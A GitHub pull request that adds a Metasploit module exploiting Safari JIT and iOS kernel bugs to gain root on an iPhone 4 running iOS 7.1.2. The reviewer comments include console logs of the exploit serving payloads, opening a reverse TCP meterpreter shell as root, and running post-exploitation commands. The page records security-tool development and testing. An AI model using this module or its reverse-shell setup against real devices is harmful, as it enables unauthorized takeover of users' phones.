Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for an iPhone 4 iOS 7.1.2 #13911

Merged
merged 5 commits into from
Aug 14, 2020
Merged

Add module for an iPhone 4 iOS 7.1.2 #13911

merged 5 commits into from
Aug 14, 2020

Conversation

timwr
Copy link
Contributor

@timwr timwr commented Jul 27, 2020
edited by h00die
Loading

This module exploits a Safari JIT vulnerability and a iOS kernel vulnerability in order to launch meterpreter on iOS 7.1.2 (tested on a fully updated iPhone 4).
Ping @kudima @WanderingGlitch @h00die

Verification

Demonstration

iPhone 4

msf5 > use exploit/apple_ios/browser/safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
msf5 exploit(apple_ios/browser/safari_jit) > set LHOST 192.168.43.200
LHOST => 192.168.43.200
msf5 exploit(apple_ios/browser/safari_jit) > set SRVHOST 192.168.43.200
SRVHOST => 192.168.43.200
msf5 exploit(apple_ios/browser/safari_jit) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) >
[*] Started reverse TCP handler on 192.168.43.200:4444
[*] Using URL: http://192.168.43.200:8080/
[*] Server started.

msf5 exploit(apple_ios/browser/safari_jit) >
[*] 192.168.43.205   safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 192.168.43.205   safari_jit - Request /loader.b64?cache=1595831577372 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 192.168.43.205   safari_jit - Request /macho.b64?cache=1595831577670 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 192.168.43.205   safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 192.168.43.205   safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (192.168.43.200:4444 -> 192.168.43.205:49175) at 2020-07-27 14:33:07 +0800

msf5 exploit(apple_ios/browser/safari_jit) > sessions

Active sessions
===============

  Id  Name  Type                         Information                                                    Connection
  --  ----  ----                         -----------                                                    ----------
  1         meterpreter armle/apple_ios  root @ iPhone (uid=0, gid=0, euid=0, egid=0) @ 192.168.43.205  192.168.43.200:4444 -> 192.168.43.205:49175 (192.168.43.205)

TODO

  • Think of a better module name than safari_jit
  • Documentation

@timwr timwr mentioned this pull request Jul 27, 2020
Merged
@h00die h00die self-assigned this Jul 27, 2020
@h00die
Copy link
Contributor

h00die commented Jul 27, 2020

I'll pick this up since I have the phone and have been testing with @timwr

@label-actions
Copy link

label-actions bot commented Jul 28, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

h00die
h00die requested changes Jul 28, 2020
View reviewed changes
external/source/exploits/CVE-2016-4669/shell.m Outdated Show resolved Hide resolved
external/source/exploits/CVE-2016-4669/shell.m Outdated Show resolved Hide resolved
external/source/exploits/CVE-2016-4669/shell.m Outdated Show resolved Hide resolved
external/source/exploits/CVE-2016-4669/shell.m Outdated Show resolved Hide resolved
external/source/exploits/CVE-2016-4669/shell.m Outdated Show resolved Hide resolved
modules/exploits/apple_ios/browser/safari_jit.rb Outdated Show resolved Hide resolved
modules/exploits/apple_ios/browser/safari_jit.rb Outdated Show resolved Hide resolved
modules/exploits/apple_ios/browser/safari_jit.rb Outdated Show resolved Hide resolved
modules/exploits/apple_ios/browser/safari_jit.rb Outdated Show resolved Hide resolved
modules/exploits/apple_ios/browser/safari_jit.rb Outdated Show resolved Hide resolved
@timwr timwr force-pushed the ios_7 branch 2 times, most recently from 9f883da to 117e587 Compare July 30, 2020 10:10
@h00die
Copy link
Contributor

h00die commented Aug 4, 2020

still need module docs :)

@h00die
Copy link
Contributor

h00die commented Aug 4, 2020

Logs on the phone look much better:

Aug  4 12:08:28 amfid[131] <Error>: /bin/G73uoN not valid: 0xe800801c: No code signature found.                                        
Aug  4 12:08:28 kernel[0] <Debug>: AMFI: Invalid signature but permitting execution

@h00die
Copy link
Contributor

h00die commented Aug 4, 2020

Working for me:

msf5 > use safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp

Matching Modules
================

   #  Name                                  Disclosure Date  Rank  Check  Description
   -  ----                                  ---------------  ----  -----  -----------
   0  exploit/apple_ios/browser/safari_jit  2016-08-25       good  No     Safari Webkit JIT Exploit for iOS 7.1.2


[*] Using exploit/apple_ios/browser/safari_jit
msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
verbose => true
msf5 exploit(apple_ios/browser/safari_jit) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/
[*] Server started.
[*] 2.2.2.2    safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 2.2.2.2    safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : iPhone3,3 (iOS 11D257)
Architecture : armv7
BuildTuple   : arm-iphone-darwin
Meterpreter  : armle/apple_ios
meterpreter > pwd
/
meterpreter > ls
Listing: /
==========

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40333/-wx-wx-wx   68    dir   2014-12-16 11:01:46 -0500  .Trashes
100000/---------  0     fil   2014-12-16 11:01:55 -0500  .file
40775/rwxrwxr-x   1938  dir   2014-12-16 11:14:45 -0500  Applications
40775/rwxrwxr-x   68    dir   2014-12-16 11:01:47 -0500  Developer
40775/rwxrwxr-x   578   dir   2014-12-16 11:15:48 -0500  Library
40755/rwxr-xr-x   102   dir   2014-12-16 11:15:26 -0500  System
40755/rwxr-xr-x   170   dir   2020-08-04 12:08:28 -0400  bin
40775/rwxrwxr-x   68    dir   2014-12-16 11:01:54 -0500  cores
40555/r-xr-xr-x   1676  dir   2020-08-04 11:56:30 -0400  dev
40755/rwxr-xr-x   578   dir   2014-12-16 11:15:49 -0500  etc
40755/rwxr-xr-x   136   dir   2014-12-16 11:15:47 -0500  private
40755/rwxr-xr-x   476   dir   2014-12-16 11:15:49 -0500  sbin
41777/rwxrwxrwx   510   dir   2020-08-04 12:01:15 -0400  tmp
40755/rwxr-xr-x   272   dir   2014-12-16 11:15:47 -0500  usr
40755/rwxr-xr-x   952   dir   2020-06-08 11:41:23 -0400  var

meterpreter >

@h00die h00die added the blocked Blocked by one or more additional tasks label Aug 4, 2020
@h00die
Copy link
Contributor

h00die commented Aug 4, 2020

module working. everything as expected. Just need some docs and to wait a few days.

@timwr timwr requested a review from h00die August 5, 2020 09:39
@h00die h00die removed blocked Blocked by one or more additional tasks needs-docs labels Aug 13, 2020
@h00die
Copy link
Contributor

h00die commented Aug 13, 2020

timwr#12

@h00die h00die merged commit cd41d9c into rapid7:master Aug 14, 2020
@h00die
Copy link
Contributor

h00die commented Aug 14, 2020
edited by pbarry-r7
Loading

Release Notes

New module exploits/apple_ios/browser/safari_jit adds a Safari exploit for IOS 7.1.2 to obtain a root-level shell by leveraging multiple exploits chained together (CVE-2016-4669, CVE-2018-4162). iPhone 4 was specifically targeted and verified for this exploit.

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 24, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@h00die h00die Awaiting requested review from h00die

Assignees

@h00die h00die

Labels
module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@timwr @h00die @adfoster-r7